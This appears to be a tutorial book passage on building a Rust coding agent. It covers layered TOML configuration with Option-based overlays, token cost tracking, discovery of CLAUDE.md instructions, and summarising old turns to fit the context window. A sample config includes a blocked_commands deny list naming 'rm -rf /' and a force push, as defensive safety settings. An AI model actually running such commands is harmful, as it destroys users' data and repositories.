A natural first attempt is "compare the overlay value against Config::default() -- if it differs, it was set." That heuristic is wrong. It cannot distinguish two different situations:
- The user did not set the field in their TOML.
- The user did set the field, and the value they set happens to equal the default.
Case 2 is not hypothetical. If the default model is "anthropic/claude-sonnet-4-20250514" and the user explicitly writes model = "anthropic/claude-sonnet-4-20250514" in their user config to assert it regardless of project overrides, the comparison-to-default heuristic silently treats it as "not set" and keeps whatever the previous layer had. Last-write-wins is violated.
The fix is to encode "set" vs "not set" in the type system. We introduce a second struct -- ConfigOverlay -- whose fields are Option<T>. Serde deserializes a missing TOML key as None and a present one as Some(value). No value comparison needed.
```rust
#[derive(Debug, Clone, Default, Deserialize)]
#[serde(default)]
pub struct ConfigOverlay {
    pub model: Option<String>,
    pub base_url: Option<String>,
    pub max_context_tokens: Option<u64>,
    pub preserve_recent: Option<usize>,
    pub allowed_directory: Option<String>,
    pub protected_patterns: Option<Vec<String>>,
    pub blocked_commands: Option<Vec<String>>,
    pub instructions: Option<String>,
}
```
The struct-level #[serde(default)] tells serde to fall back to Default::default() for any field missing from the TOML input -- and Default::default() for Option<T> is None. That is exactly the "key absent → None" mapping we want, and we get it without annotating every field individually.
The two structs play complementary roles. Config is the fully-resolved output: every field has a value, everyone downstream can read it without caring how it got there. ConfigOverlay is the transport format: a partial, optional view of the same shape, used only while merging layers.
Even Vec<T> fields become Option<Vec<T>>. This matters -- an overlay that sets protected_patterns = [] in TOML means "clear the list," which is different from "did not mention the list at all." An Option<Vec<T>> represents both cases cleanly; a bare Vec<T> cannot.
The merge logic
With the overlay in hand, merge becomes uniform: every Some(_) in the overlay replaces the corresponding field in the base, and every None leaves the base untouched.
```rust
pub fn merge(base: Config, overlay: ConfigOverlay) -> Config {
    Config {
        model: overlay.model.unwrap_or(base.model),
        base_url: overlay.base_url.unwrap_or(base.base_url),
        max_context_tokens: overlay.max_context_tokens.unwrap_or(base.max_context_tokens),
        preserve_recent: overlay.preserve_recent.unwrap_or(base.preserve_recent),
        allowed_directory: overlay.allowed_directory.or(base.allowed_directory),
        protected_patterns: overlay.protected_patterns.unwrap_or(base.protected_patterns),
        blocked_commands: overlay.blocked_commands.unwrap_or(base.blocked_commands),
        instructions: overlay.instructions.or(base.instructions),
    }
}
```
Two patterns cover every field:
- unwrap_or(base.x) for fields where Config holds a concrete value (e.g. String, u64, Vec<String>). If the overlay has Some(v), the result is v; otherwise the base value is kept.
- .or(base.x) for fields that are already Option<T> on Config (allowed_directory, instructions). Option::or returns the first Some(_) it finds.
That is the entire merge. No value comparisons. No special cases per field. A later layer always wins when it sets a field, regardless of whether the value it sets matches the default, matches the previous layer, or is empty.
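The two combinators can be exercised in isolation. This stdlib-only sketch also includes the set-to-the-default-value case that the comparison-to-default heuristic would mishandle; the model strings are the chapter's examples:

```rust
fn main() {
    let default_model = "anthropic/claude-sonnet-4-20250514".to_string();

    // unwrap_or: a None overlay keeps the base value.
    let overlay: Option<String> = None;
    assert_eq!(overlay.unwrap_or(default_model.clone()), default_model);

    // Explicitly set to the default value: still Some, still wins over any base.
    let overlay = Some(default_model.clone());
    assert_eq!(overlay.unwrap_or("some-project-model".to_string()), default_model);

    // Option::or for fields that are Option<T> on Config itself.
    let base_instructions = Some("project note".to_string());
    let overlay_instructions: Option<String> = None;
    assert_eq!(
        overlay_instructions.or(base_instructions),
        Some("project note".to_string())
    );

    // An explicit empty Vec replaces the base list; None would have kept it.
    let base_patterns = vec![".env".to_string()];
    let overlay_patterns: Option<Vec<String>> = Some(Vec::new());
    assert!(overlay_patterns.unwrap_or(base_patterns).is_empty());

    println!("merge semantics hold");
}
```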
Collections: replace, not append
When an overlay does set protected_patterns or blocked_commands, its value fully replaces the base. Appending would mean every config layer adds to the list with no way to remove entries from a lower layer. Replacing gives each layer that mentions the field full control over its contents.
Consider a project that protects .env and .secret at the project level. If the user config also sets protected_patterns = [".credentials"], the replace strategy means only .credentials is protected -- the project patterns are gone. Since project config is loaded first (lowest priority among files) and user config is loaded second (higher priority), the user config's patterns replace the project's. For most settings this makes sense -- the user knows their environment better than the project author.
If you wanted append semantics, you would extend the collections instead:
```rust
// Append (not what we do):
if let Some(extra) = overlay.protected_patterns {
    base.protected_patterns.extend(extra);
}
```
Claude Code supports both strategies depending on the field. Our implementation keeps it simple with replace-only, and the overlay's Option<Vec<T>> type is what lets "layer did not mention this field" stay distinct from "layer explicitly set it to an empty list."
ConfigLoader: assembling the layers
The ConfigLoader orchestrates the full merge pipeline:
```rust
pub struct ConfigLoader {
    project_dir: Option<PathBuf>,
}

impl ConfigLoader {
    pub fn new() -> Self {
        Self { project_dir: None }
    }

    pub fn project_dir(mut self, dir: impl Into<PathBuf>) -> Self {
        self.project_dir = Some(dir.into());
        self
    }

    pub fn load(&self) -> Config {
        let mut config = Config::default();

        // Layer 1: Project config (.claw/config.toml)
        if let Some(ref dir) = self.project_dir {
            let project_path = dir.join(".claw").join("config.toml");
            if let Some(overlay) = Self::load_file(&project_path) {
                config = Self::merge(config, overlay);
            }
        }

        // Layer 2: User config (~/.config/mini-claw/config.toml)
        if let Some(user_dir) = dirs::config_dir() {
            let user_path = user_dir.join("mini-claw").join("config.toml");
            if let Some(overlay) = Self::load_file(&user_path) {
                config = Self::merge(config, overlay);
            }
        }

        // Layer 3: Environment variables (highest priority)
        config = Self::apply_env(config);

        config
    }
}
```
The builder pattern lets callers optionally specify a project directory. In a real agent, this is the working directory where the user invoked the tool. In tests, it is a temp directory.
The load order matters
The load() method applies layers from lowest to highest priority:
- Start with Config::default() -- the absolute baseline.
- Merge the project config (.claw/config.toml) -- project-specific overrides.
- Merge the user config (~/.config/mini-claw/config.toml) -- user-wide preferences.
- Apply environment variables -- the ultimate override.
Each merge takes the current accumulated config as the base and the new layer as the overlay. Every field the overlay actually set -- every Some(_) -- replaces the base value; everything else falls through. This means user config beats project config, and environment variables beat everything.
The dirs::config_dir() call uses the dirs crate to find the platform-appropriate config directory -- ~/.config on Linux, ~/Library/Application Support on macOS, %APPDATA% on Windows. This follows the XDG Base Directory Specification on Linux and platform conventions elsewhere.
Loading a single file
```rust
pub fn load_file(path: &Path) -> Option<ConfigOverlay> {
    let content = std::fs::read_to_string(path).ok()?;
    toml::from_str(&content).ok()
}
```
Two lines, two possible failure points, both handled with .ok()?:
- The file might not exist -- read_to_string returns Err, .ok() converts to None, ? returns None.
- The file might contain invalid TOML -- toml::from_str returns Err, same chain.
Notice the return type is Option<ConfigOverlay>, not Option<Config>. The loader deliberately parses into the partial type -- that is how merge later knows which fields the file actually mentioned.
Returning Option<_> instead of Result<_, Error> is a deliberate choice. Missing config files are not errors -- they are the normal case. Most users will not have a user config file. Most projects will not have a .claw/config.toml. The loader should silently skip missing files and apply defaults. Invalid TOML is arguably an error worth reporting, but for simplicity we treat it the same way. A production implementation would log a warning for parse failures while still falling back to defaults.
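The .ok()? chain behaves identically with any fallible parse. Here is a stdlib-only sketch that swaps toml::from_str for an integer parse so it runs without the toml crate; the load_number helper and file name are hypothetical:

```rust
use std::path::Path;

// Same shape as load_file: a missing file or unparseable content both collapse to None.
fn load_number(path: &Path) -> Option<u64> {
    let content = std::fs::read_to_string(path).ok()?;
    content.trim().parse().ok()
}

fn main() {
    // A path that does not exist: read_to_string fails, `?` returns None.
    assert_eq!(load_number(Path::new("/nonexistent/config-number")), None);

    // A real file with invalid content: the parse fails, same result.
    let path = std::env::temp_dir().join("mini-claw-demo.txt");
    std::fs::write(&path, "not a number").unwrap();
    assert_eq!(load_number(&path), None);

    // Valid content parses to Some.
    std::fs::write(&path, "42").unwrap();
    assert_eq!(load_number(&path), Some(42));

    std::fs::remove_file(&path).ok();
    println!("ok");
}
```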
The toml crate handles deserialization. Because every field on ConfigOverlay is Option<T> with #[serde(default)], a TOML file that only sets one field still parses cleanly -- every other field becomes None:
# This is a valid config file:
model = "anthropic/claude-haiku-3-20250414"
This deserializes into a ConfigOverlay with model: Some(...) and every other field None. When merge applies it, only model is touched on the base.
Environment variable overrides
```rust
fn apply_env(mut config: Config) -> Config {
    if let Ok(model) = std::env::var("MINI_CLAW_MODEL") {
        config.model = model;
    }
    if let Ok(url) = std::env::var("MINI_CLAW_BASE_URL") {
        config.base_url = url;
    }
    if let Ok(tokens) = std::env::var("MINI_CLAW_MAX_TOKENS") {
        if let Ok(n) = tokens.parse::<u64>() {
            config.max_context_tokens = n;
        }
    }
    config
}
```
Environment variables are the simplest layer -- no files, no parsing, no merge logic. If the variable exists, its value replaces the field. If it does not exist, the field is untouched.
Only three fields have environment variable support: model, base_url, and max_context_tokens. These are the fields most commonly overridden in CI and scripting contexts. Safety fields like blocked_commands and protected_patterns are intentionally excluded from environment overrides -- you do not want a compromised environment variable to disable your safety rules.
Notice the double-parse for MINI_CLAW_MAX_TOKENS: first std::env::var to get the string, then .parse::<u64>() to convert it to a number. If the string is not a valid integer, the parse silently fails and the existing value is kept. No panic, no error message. This is the right behavior for environment variables -- a typo in MINI_CLAW_MAX_TOKENS=abc should not crash the agent.
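The same guard-and-parse shape can be tried directly. The variable name and helper below are arbitrary for the demo, and std::env::set_var stands in for a real environment:

```rust
// Apply an env override if the variable is present and parseable;
// otherwise keep the current value. Mirrors the MINI_CLAW_MAX_TOKENS handling.
fn max_tokens_from_env(var: &str, current: u64) -> u64 {
    match std::env::var(var) {
        Ok(s) => s.parse().unwrap_or(current),
        Err(_) => current,
    }
}

fn main() {
    // Unset: the existing value survives.
    assert_eq!(max_tokens_from_env("DEMO_MAX_TOKENS", 200_000), 200_000);

    // Set to a valid number: it wins.
    std::env::set_var("DEMO_MAX_TOKENS", "8000");
    assert_eq!(max_tokens_from_env("DEMO_MAX_TOKENS", 200_000), 8_000);

    // Set to garbage: the parse fails quietly and the old value is kept.
    std::env::set_var("DEMO_MAX_TOKENS", "abc");
    assert_eq!(max_tokens_from_env("DEMO_MAX_TOKENS", 200_000), 200_000);

    println!("ok");
}
```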
CostTracker: knowing what you spend
Every LLM API call costs money. The cost depends on two factors: how many tokens you send (input) and how many tokens the model generates (output). Different models have wildly different pricing -- Claude Sonnet is roughly $3 per million input tokens and $15 per million output tokens, while Haiku is an order of magnitude cheaper.
A coding agent makes many API calls per session. A complex task might run 20-30 tool-use turns, each sending the full conversation history. Without tracking, you have no idea whether a session cost $0.02 or $2.00. The CostTracker accumulates token counts across a session and computes the running cost.
```rust
pub struct CostTracker {
    input_tokens: u64,
    output_tokens: u64,
    turn_count: u64,
    input_price_per_million: f64,
    output_price_per_million: f64,
}
```
Five fields. The first three are accumulators that grow with each API call. The last two are constants set at construction time based on the model's pricing.
Construction
```rust
impl CostTracker {
    pub fn new(input_price_per_million: f64, output_price_per_million: f64) -> Self {
        Self {
            input_tokens: 0,
            output_tokens: 0,
            turn_count: 0,
            input_price_per_million,
            output_price_per_million,
        }
    }
}
```
The caller provides pricing. For Claude Sonnet: CostTracker::new(3.0, 15.0). For Haiku: CostTracker::new(0.25, 1.25). This separates the tracker from model-specific knowledge -- it just counts tokens and multiplies by rates.
Recording usage
```rust
pub fn record(&mut self, usage: &crate::types::TokenUsage) {
    self.input_tokens += usage.input_tokens;
    self.output_tokens += usage.output_tokens;
    self.turn_count += 1;
}
```
Called after each provider response. The TokenUsage struct (from Chapter 4) carries the per-request token counts. The tracker accumulates them and increments the turn counter.
Note that record takes a reference to TokenUsage, not ownership. The caller typically has the usage attached to an AssistantTurn and should not have to give it up just to record costs.
Computing cost
```rust
pub fn total_cost(&self) -> f64 {
    let input_cost = self.input_tokens as f64 * self.input_price_per_million / 1_000_000.0;
    let output_cost = self.output_tokens as f64 * self.output_price_per_million / 1_000_000.0;
    input_cost + output_cost
}
```
Straightforward arithmetic. Input tokens times input price per million, divided by a million. Same for output. Add them together. The result is in USD.
For a session with 100 input tokens at $3/M and 50 output tokens at $15/M:
input: 100 * 3.0 / 1,000,000 = 0.0003
output: 50 * 15.0 / 1,000,000 = 0.00075
total: 0.00105
That is $0.00105 -- about a tenth of a cent. A typical interactive session costs $0.05-$0.50 depending on complexity and model choice.
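The arithmetic above can be checked as a standalone function. The pricing numbers are the chapter's examples, not live rates:

```rust
// Cost in USD for token counts at per-million-token prices.
fn cost_usd(input_tokens: u64, output_tokens: u64, in_per_m: f64, out_per_m: f64) -> f64 {
    let input_cost = input_tokens as f64 * in_per_m / 1_000_000.0;
    let output_cost = output_tokens as f64 * out_per_m / 1_000_000.0;
    input_cost + output_cost
}

fn main() {
    // 100 input tokens at $3/M plus 50 output tokens at $15/M = $0.00105.
    let total = cost_usd(100, 50, 3.0, 15.0);
    assert!((total - 0.00105).abs() < 1e-12);

    // A heavier exchange: 5000 in + 1000 out at the same pricing = $0.03.
    let session = cost_usd(5_000, 1_000, 3.0, 15.0);
    assert!((session - 0.03).abs() < 1e-12);

    println!("${:.5}", total);
}
```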
Summary formatting
```rust
pub fn summary(&self) -> String {
    format!(
        "tokens: {} in + {} out | cost: ${:.4}",
        self.input_tokens, self.output_tokens, self.total_cost()
    )
}
```
Produces a string like "tokens: 5000 in + 1000 out | cost: $0.0300". Four decimal places gives sub-cent precision. A TUI would display this in the status bar -- a constant reminder of what the session is costing.
Reset
```rust
pub fn reset(&mut self) {
    self.input_tokens = 0;
    self.output_tokens = 0;
    self.turn_count = 0;
}
```
Zeroes the accumulators but keeps the pricing. Useful when starting a new logical task within the same session, or for per-conversation cost tracking in a multi-conversation agent.
Accessor methods
The tracker exposes its accumulators through read-only methods:
```rust
pub fn total_input_tokens(&self) -> u64 { self.input_tokens }
pub fn total_output_tokens(&self) -> u64 { self.output_tokens }
pub fn turn_count(&self) -> u64 { self.turn_count }
```
These let the UI and logging systems read the state without mutation. The fields themselves are private -- the only way to modify them is through record() and reset(), which keeps the accounting consistent.
Putting it together: a sample config file
Here is what a project's .claw/config.toml might look like:
model = "anthropic/claude-sonnet-4-20250514"
max_context_tokens = 100000
protected_patterns = [".env", "*.lock", "secrets/*"]
blocked_commands = ["rm -rf /", "git push --force"]
instructions = "Always run cargo fmt after editing Rust files."
And a user's ~/.config/mini-claw/config.toml:
model = "anthropic/claude-sonnet-4-20250514"
base_url = "https://my-proxy.example.com/v1"
When both exist, the loader merges them:
- Defaults -- all fields get their default values.
- Project config parses into a ConfigOverlay with Some(_) for exactly the keys the file mentions: model, max_context_tokens, protected_patterns, blocked_commands, instructions. merge applies each one to the base.
- User config parses into an overlay with Some(_) for model and base_url. Even though its model value happens to equal the default, that no longer matters -- the overlay says the field was set, so it replaces the project's value. base_url likewise replaces the default.
- Environment -- if MINI_CLAW_MODEL is set, it overrides everything.
The final config has the project's safety rules, the user's model and proxy URL, and defaults for everything else. Each layer contributes what it knows without needing to repeat what it does not care about, and a layer is never silently ignored just because the value it set coincides with the default.
How Claude Code does it
Claude Code has a similar 4-level hierarchy: project settings, user settings, environment, defaults. The details differ in instructive ways.
Format. Claude Code uses JSON (settings.json, settings.local.json) rather than TOML. JSON is more familiar to web developers (Claude Code's primary audience) and integrates naturally with TypeScript. We use TOML because it is the Rust ecosystem standard -- every Rust developer already reads Cargo.toml daily.
Merge sophistication. Claude Code supports per-key override strategies. Some fields append (permission rules accumulate across layers), some replace (model name), and some use first-wins semantics (project instructions take precedence over user instructions for the same key). Our merge logic uses a single strategy: every field the overlay set replaces the base, collections included. Simpler, but it covers the common cases.
Cost tracking. Claude Code tracks costs per model with cache-aware pricing. When the API reports cache_read_tokens, those tokens are billed at a reduced rate (typically 90% cheaper than regular input tokens). Our CostTracker ignores caching -- it treats all input tokens the same. Adding cache-aware pricing would mean extending record() to accept cache_read_tokens and applying a separate rate, but the architecture does not change.
Validation. Claude Code validates settings on load -- unknown keys produce warnings, type mismatches produce errors. Our load_file silently drops unparseable files. A production implementation would validate and report.
Despite these differences, the layered architecture is the same. Settings flow from general (defaults) to specific (environment), each layer overriding the previous. The Config struct is the single source of truth for the entire agent, passed to every subsystem that needs to know how to behave.
Tests
Run the tests:
cargo test -p mini-claw-code-starter config # Config, ConfigLoader
cargo test -p mini-claw-code-starter cost_tracker # CostTracker
Note: Config and ConfigLoader tests are in config (following the V1
numbering where configuration was Chapter 16). CostTracker tests are in
cost_tracker (V1 token tracking chapter).
Key config tests (config):
- test_config_default_config -- `Config::default()` produces the expected model, token limit, and non-empty safety defaults.
- test_config_load_from_toml -- A TOML string with `model` and `max_context_tokens` deserializes correctly.
- test_config_default_fills_missing_fields -- A TOML file with only `model` still gets defaults for `preserve_recent`, `instructions`, etc.
- test_config_load_nonexistent_path -- Loading from a non-existent path returns `None` instead of panicking.
- test_config_mcp_server_config -- MCP server configuration round-trips through TOML correctly.
- test_config_hooks_config -- Hook configuration (command, tool_pattern, timeout) deserializes from TOML.
- test_config_env_override -- Setting the `MINI_CLAW_MODEL` environment variable overrides the model in the loaded config.
- test_config_protected_patterns_default -- Default config includes `.env` and `.git/**` in protected patterns.
Key cost tracker tests (cost_tracker):
- test_cost_tracker_empty_tracker -- A new tracker starts at zero tokens, zero turns, zero cost.
- test_cost_tracker_record_single_turn -- Recording one turn increments input/output tokens and the turn counter.
- test_cost_tracker_accumulates_across_turns -- Three `record()` calls accumulate totals correctly.
- test_cost_tracker_cost_calculation -- 1M input + 1M output tokens at $3/$15 per million = $18.00.
- test_cost_tracker_cost_small_numbers -- 1000 input + 200 output tokens = $0.006.
- test_cost_tracker_summary_format -- `summary()` produces the expected `"tokens: N in + N out | cost: $X.XXXX"` format.
- test_cost_tracker_reset -- `reset()` zeroes accumulators but preserves pricing.
Key takeaway
Layered configuration lets each level (defaults, project, user, environment) contribute only what it knows. Splitting the shape into a fully-resolved `Config` and a partial `ConfigOverlay` (fields are `Option<T>`) puts the "was this field set?" question in the type system: `None` means the file did not mention it, `Some(v)` means it did -- regardless of what `v` is. Merge then has a single rule: every `Some(_)` replaces the base.
Recap
This chapter built two subsystems that the rest of the agent depends on.
- `Config` holds every configurable parameter in a single struct. Serde's `#[serde(default)]` attributes make partial TOML files work -- you only set what you want to change.
- `ConfigOverlay` is the partial counterpart to `Config`: every field is `Option<T>`. `None` means the field was not set in the layer, `Some(v)` means it was -- and stays distinguishable from the default even when `v` happens to equal the default.
- `ConfigLoader` implements the 4-level merge pipeline: defaults, project config, user config, environment variables. Each file layer is parsed into a `ConfigOverlay` and applied with a single rule: every `Some(_)` replaces the base.
- `CostTracker` accumulates token usage across a session and computes estimated cost from per-million pricing. Its `summary()` method produces the one-line status string the TUI displays.
- The merge strategy is the key design decision. Encoding "set vs unset" in the type system (instead of guessing from the value) guarantees last-write-wins and makes explicit resets -- clearing a list, re-asserting a default -- work correctly.
- Environment variables are deliberately limited to three fields. Safety-critical settings like `blocked_commands` and `protected_patterns` should come from config files that are checked into source control or managed explicitly -- not from environment variables that might be manipulated.
What's next
Configuration tells the agent how to behave. Chapter 18 -- Project Instructions -- tells it what to know. The instructions field you saw in Config is just a string. The instruction system reads CLAUDE.md files from the project tree, merges them with user instructions, and injects them into the system prompt. Together, settings and instructions make the agent context-aware -- it adapts its behavior and knowledge to each project it works in.
Check yourself
← Chapter 16: Plan Mode · Contents · Chapter 18: Project Instructions →
Chapter 18: Project Instructions & Context Management
File(s) to edit: `src/context.rs`
Tests to run: `cargo test -p mini-claw-code-starter instructions` (InstructionLoader), `cargo test -p mini-claw-code-starter context_manager` (ContextManager)
Estimated time: 40 min
This chapter closes the loop on two pieces that keep an agent running over a long session:
- `InstructionLoader` (built in Chapter 8) discovers CLAUDE.md files by walking up the filesystem. We revisit it here to see how its output gets injected into the conversation at session start.
- `ContextManager` (new in this chapter) keeps the conversation inside the model's context window by summarising old turns once the token budget is exceeded. This is the piece you fill in.
In Chapter 17 you added Config, a layered settings hierarchy. One of its
fields is instructions: Option<String> -- custom text the user can put in a
TOML config file and have injected into the system prompt.
This chapter wires all three together. It is the chapter where your agent
becomes project-aware (launching from /home/user/project/backend picks up
different CLAUDE.md files than /home/user/other) and session-durable (a
20-turn debugging session does not hit the context wall).
cargo test -p mini-claw-code-starter instructions # InstructionLoader
cargo test -p mini-claw-code-starter context_manager # ContextManager
Goal
- Understand how `InstructionLoader` output and `Config.instructions` get injected as system messages at session start.
- Implement `ContextManager::record` so token usage from each turn accumulates into a running total.
- Implement `ContextManager::compact` so that once the budget is exceeded, the middle of the message history is replaced by an LLM-generated summary while the system prompt and the most recent messages are preserved intact.
- Understand why the system prompt (which includes discovered CLAUDE.md content) must survive compaction unchanged -- it is the one message the LLM needs on every turn.
The session-level pipeline
Here is the complete flow. At session start instructions are discovered and
pushed into the message history. During the session the ContextManager
watches token usage and compacts the middle of that history once the budget
is exceeded.
┌─────────────────────────────┐
│ Filesystem │ (at session start)
│ │
│ /home/user/CLAUDE.md │──┐
│ /home/user/project/ │ │
│ CLAUDE.md │──┤ InstructionLoader::discover()
│ backend/ │ │ walks upward, collects paths
│ CLAUDE.md │──┤
│ .claw/instructions.md │──┘
└─────────────────────────────┘
│
▼
┌─────────────────────────────┐
│ InstructionLoader::load() │
│ concatenates with headers │
│ and --- separators │
└─────────────────────────────┘
│
▼
┌─────────────────────────────┐
│ messages[0] = System( │ (injected once, never edited)
│ "# Instructions from ... │
│ <concatenated CLAUDE>" │
│ ) │
└─────────────────────────────┘
│
▼ (agent loop: User → Assistant → ToolResult → ...)
│
┌─────────────────────────────┐
│ ContextManager │ (runs after every turn)
│ │
│ .record(usage) │ ← accumulate input + output tokens
│ .should_compact() │ ← tokens_used >= max_tokens?
│ │
│ On trigger: │
│ keep messages[0] │ ← the system/instructions message
│ ask provider to │
│ summarise middle │ ← LLM call with the old transcript
│ keep last N messages │
│ │
│ Result: short history, │
│ same system prompt. │
└─────────────────────────────┘
Two points to notice.
Instructions are stable within a session. They are loaded once, become the
first system message, and are never rewritten. Launch from a different
directory and you get a different messages[0], but once a session has
started the instruction content is fixed. Users generally do not edit
CLAUDE.md mid-chat.
Context management is session-level, not prompt-level. Compaction does not splice new sections into a "system prompt"; it rewrites the message history by summarising the middle. The system prompt (which carries your instructions) is deliberately excluded from compaction -- it is always the anchor.
Revisiting InstructionLoader
You built this in Chapter 8. Let's revisit the code now that we are using it in a real pipeline, because the design decisions matter more in context.
The struct
```rust
pub struct InstructionLoader {
    file_names: Vec<String>,
}
```
The loader does not hardcode which files to look for. It takes a list of file
names, and default_files() sets that list to ["CLAUDE.md", ".claw/instructions.md"]. This means you can swap in different file names
for testing, or add project-specific alternatives without modifying the loader.
```rust
impl InstructionLoader {
    pub fn new(file_names: &[&str]) -> Self {
        Self {
            file_names: file_names.iter().map(|s| s.to_string()).collect(),
        }
    }

    pub fn default_files() -> Self {
        Self::new(&["CLAUDE.md", ".claw/instructions.md"])
    }
}
```
Discovery: the upward walk
```mermaid
flowchart BT
    A["/home/user/project/backend/"] -->|check for CLAUDE.md| B["/home/user/project/"]
    B -->|check for CLAUDE.md| C["/home/user/"]
    C -->|check for CLAUDE.md| D["/home/"]
    D -->|check for CLAUDE.md| E["/"]
    A -.->|"found: backend/CLAUDE.md"| F["Collected paths<br/>(reversed to root-first)"]
    B -.->|"found: project/CLAUDE.md"| F
    C -.->|"found: user/CLAUDE.md"| F
```
discover() starts at the given directory and walks toward the filesystem
root. At each directory, it checks for every file name in the list:
```rust
pub fn discover(&self, start_dir: &Path) -> Vec<PathBuf> {
    let mut found = Vec::new();
    let mut dir = Some(start_dir.to_path_buf());
    while let Some(current) = dir {
        for name in &self.file_names {
            let candidate = current.join(name);
            if candidate.is_file() {
                found.push(candidate);
            }
        }
        dir = current.parent().map(|p| p.to_path_buf());
    }
    found.reverse(); // Root-first order
    found
}
```
The found.reverse() at the end is the key design choice. The walk naturally
collects files from most-specific to most-general (start directory first, root
last). Reversing puts them in root-first order.
After discover("/home/user/project/backend") with CLAUDE.md files at three
levels, the vector is:
[0] /home/user/CLAUDE.md ← global preferences
[1] /home/user/project/CLAUDE.md ← project conventions
[2] /home/user/project/backend/CLAUDE.md ← subdirectory rules
Global preferences come first. The most specific rules come last. When the LLM reads the system prompt, the last instructions have the strongest influence -- the same principle as CSS specificity: general rules first, overrides last.
Loading: read, filter, join
load() calls discover(), reads each file, and concatenates the results:
```rust
pub fn load(&self, start_dir: &Path) -> Option<String> {
    let paths = self.discover(start_dir);
    if paths.is_empty() {
        return None;
    }
    let mut sections = Vec::new();
    for path in &paths {
        if let Ok(content) = std::fs::read_to_string(path) {
            let content = content.trim().to_string();
            if !content.is_empty() {
                sections.push(format!(
                    "# Instructions from {}\n\n{}",
                    path.display(),
                    content
                ));
            }
        }
    }
    if sections.is_empty() {
        None
    } else {
        Some(sections.join("\n\n---\n\n"))
    }
}
```
Four details:
Headers. Each file's content is prefixed with # Instructions from <path>.
This tells the LLM where each block came from, helping it resolve
contradictions between levels.
Separators. Files are joined with \n\n---\n\n -- a horizontal rule in
markdown that gives the LLM a clear boundary between instruction blocks.
Empty file skipping. If a CLAUDE.md exists but is empty or whitespace-only, it is silently skipped. No point wasting context tokens on an empty section.
Returning None. If no instruction files are found, or all are empty,
load() returns None rather than Some(""). This lets the caller skip
adding an instructions section entirely.
The instruction hierarchy
Instructions can come from multiple sources. Here is the full hierarchy, from broadest to most specific:
Source Priority Section type
──────────────────────────────────────────────────────────────
/home/user/CLAUDE.md lowest file (root-first)
/home/user/project/CLAUDE.md ↓ file
/home/user/project/backend/CLAUDE.md ↓ file
.claw/instructions.md ↓ file (alternative)
Config.instructions highest config
File-based instructions are discovered by the InstructionLoader and appear
in root-first order. Config-based instructions come from the Config struct's
instructions field -- loaded from .claw/config.toml or
~/.config/mini-claw/config.toml.
Both become dynamic sections in the system prompt. File instructions are added first, config instructions second. Since the LLM reads the prompt top-to-bottom, config instructions have the final word when there is a conflict.
Why two sources?
CLAUDE.md files are committed to version control. They represent team
conventions that everyone on the project shares. "Run tests with cargo test."
"Never modify generated files." "Use edition 2024."
Config instructions are local. They live in .claw/config.toml (which may or
may not be committed) or in the user's home config directory (which is never
committed). They represent personal preferences or temporary overrides.
"Always explain your reasoning." "Focus on performance over readability for
this session."
Key Rust concept: Option chaining with if let for optional pipeline steps
The wiring code uses `if let Some(instructions) = loader.load(...)` to conditionally add sections. This pattern is idiomatic Rust for optional pipeline steps: `InstructionLoader::load()` returns `Option<String>` -- `None` when no instruction files exist, `Some(text)` when they do. The `if let` binding destructures the `Option` and only executes the body when there is a value. Similarly, `Config.instructions` is `Option<String>`, and `if let Some(ref inst) = config.instructions` only adds the section when the config has instructions. This means the prompt builder never adds empty sections -- the system prompt is exactly as long as it needs to be.
Wiring it together
Session startup is where InstructionLoader meets Config.instructions. Both
end up as system messages at the head of the conversation. In code:
```rust
let loader = InstructionLoader::default_files();
let mut messages: Vec<Message> = Vec::new();

// File-based instructions (CLAUDE.md, root-first).
if let Some(instructions) = loader.load(Path::new(cwd)) {
    messages.push(Message::System(instructions));
}

// Config-based instructions get the last word.
if let Some(ref inst) = config.instructions {
    messages.push(Message::System(inst.clone()));
}
```
Message::System is the variant we have been using throughout the book for
the agent's instructions. Both sources become system messages at the head of
the history, in priority order: global → project → subdirectory → config. The
LLM reads them top-down, so later messages override earlier ones when they
disagree.
For this book we do not maintain a separate structured "prompt builder" that
tracks identity / safety / environment / instructions as named sections. A
production agent like Claude Code does: see the sidebar below for the shape
of that design. What matters for the rest of this chapter is that the
instructions are now sitting at the start of messages, and that the agent
loop never touches them again.
Sidebar: prompt builders in production agents (conceptual)
Claude Code and similar agents separate the system prompt into named sections -- identity, safety, tool schemas, environment, instructions -- and split the list across a cache boundary. Everything above the boundary is stable across turns and can be marked cacheable by the provider; everything below can change and is re-sent each turn.
Schematically (this is not in the starter):
# identity, safety, tool schemas ← cached prefix, stable across turns
# ──── cache boundary ─────────
# environment, instructions ← dynamic suffix, may change
This design wins real cost and latency: long stable prefixes are processed
once and reused. The starter does not model it explicitly because our
Message::System messages already live in a single list; provider-side
caching (when implemented) can key off the prefix of that list.
For the rest of the chapter we focus on what the starter does model:
keeping the conversation short enough to fit in the context window as the
session runs long. That job belongs to ContextManager.
ContextManager: the compaction algorithm
The starter's ContextManager lives in src/context.rs. It has three
responsibilities:
- Track token usage (`record`): add the input + output tokens from each provider turn to a running counter.
- Decide when to act (`should_compact`): return `true` once the counter hits the configured budget.
- Rewrite history when asked (`compact`): collapse old messages into a single LLM-generated summary while preserving the anchors.
The struct
```rust
pub struct ContextManager {
    max_tokens: u64,
    preserve_recent: usize,
    tokens_used: u64,
}
```
Two knobs, one piece of state.
- `max_tokens` -- the soft limit. When `tokens_used` reaches it, compaction triggers. Set this comfortably below the model's hard context limit so there is room for the next turn to complete before you shrink.
- `preserve_recent` -- how many trailing messages survive compaction untouched. These carry the immediate conversational context: the last user turn, the tool call you just made, the tool result you are about to reason about. Summarising them would break the next turn.
- `tokens_used` -- the running total, updated by `record` after every provider call.
Recording and triggering
record is tiny -- it just accumulates:
```rust
pub fn record(&mut self, usage: &TokenUsage) {
    self.tokens_used += usage.input_tokens + usage.output_tokens;
}
```
And should_compact compares against the budget:
```rust
pub fn should_compact(&self) -> bool {
    self.tokens_used >= self.max_tokens
}
```
The agent loop calls record after each provider turn and then
maybe_compact, which only invokes compact when the threshold is reached.
In practice this means compaction is rare: most turns are under budget and do
nothing.
Compaction: head + summary + tail
compact splits the message history into three slices:
messages = [ head | middle | recent ]
<-- keep ---->|<-- summarise->|<-- keep intact ->
- head -- the leading `Message::System` (if present). This is where the CLAUDE.md-derived instructions live. Always preserved.
- middle -- everything between the head and the last `preserve_recent` messages. This is what gets summarised.
- recent -- the last `preserve_recent` messages. Always preserved.
The middle is rendered as a compact transcript ("User: ...",
"Assistant: ...", " [tool: name]", " Tool result: <preview>"), sent to
the provider with a short instruction ("Summarise in 2-3 sentences,
preserving key facts and decisions"), and the result becomes a single synthetic
system message: Message::System("[Conversation summary]: ...").
